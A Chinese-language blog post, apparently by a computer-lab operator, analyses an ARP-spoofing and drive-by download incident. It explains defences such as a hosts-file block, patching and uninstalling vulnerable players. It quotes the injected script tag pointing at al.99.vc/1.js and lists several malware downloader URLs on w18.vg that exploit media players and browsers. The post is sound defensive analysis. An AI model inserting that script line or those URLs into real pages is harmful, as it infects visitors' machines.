al.99.vc挂马分析与解决建议
arp最近似乎有热起来啦。这几天人一多就卡,不是一般的卡,QQ上去倒是没啥问题。就是网页几乎就打不开。巨慢!!
昨晚把机子都检查啦便并且关闭网络恢复系统。早起又中。
名字不一样,其中一个是usrinit.exe,我打算用好的userinit.exe去覆盖中毒的机子。
360arp防火墙打开不时会报警。但没有ip地址只有mac。这种欺骗性的arp用360arp防火墙根本不起作用似的。
因为这个机房我就让这个机子上拉,所以肯定是其他机房也arp啦
打开qq空间已经被挂马啦。
<script src=http://al.99.vc/1.js></script> <html><head><meta http-equiv=”Content-Type” content=”text/html;charset=gb2312″ /><script>var g_Src_Domain=”u.cnc.qzone.qq.com”,g_iUin=27020287,_s_=new Date(),g_JSON=1;</script><script src=”http://u.cnc.qzone.qq.com/cgi-bin/entry_js.cgi?uin=27020287&r=cnc”></script><script src=”http://cnc.imgcache.qq.com/qzone/G4.1.js”></script><script>if (typeof G41Loaded==”undefined”) location=”http://qzone.qq.com/new_help/error.htm”</script><noscript><img src=”http://cnc.imgcache.qq.com/qzone/noscript.gif”></noscript></html>
其他的站打开都没问题。刚发现还以为是腾讯空间有问题呢。急忙让朋友liu测试下没有发现我这情况(红色部分的挂马代码)。所以认为是被其他机房机子arp啦,arp dns!!!
看看放学能不能给别的机房沟通沟通看看。解决问题。
al.99.vc/1.js
这个主要是几个“图片”文件(所谓的木马下载者)!
http://w18.vg/real.gif貌似感染real,
http://w18.vg/ms.gif 种ie7
http://w18.vg/baidu.gif
http://w18.vg/x1.gif
http://w18.vg/lz.gif
http://w18.vg/bf.gif
先留着样本,闲下来在分析。
忙起来啦在说吧
解决建议:
修改系统盘:C:\WINDOWS\system32\drivers\etc\host(用记事本打开)文件添加这句可以临时解决再次中这个站的木马病毒
127.0.0.1 al.99.vc
屏蔽这个网站就可以啦
。。。
http://w18.vg/real.gif貌似感染real,如果你有realone建议卸掉或者去官方下载最新的版本装上。如果你看到realone不是有错误提示说明你的realone有漏洞。
http://w18.vg/ms.gif这个貌似只有ie7才会被中上。所以建议你打上最新的ie补丁。
http://w18.vg/baidu.gif百度搜霸的漏洞利用,建议直接卸掉就可以啦。或者升级你的搜霸。
http://w18.vg/x1.gif这个已经为404页啦不清楚是什么
http://w18.vg/lz.gif利用的是glchat的漏洞是一个聊天工具
http://w18.vg/bf.gif暴风影音的漏洞利用,建议去下载新的暴风影音
如果个人机子建议打开病毒实时检测功能。
如果你有更好的建议,谢谢分享。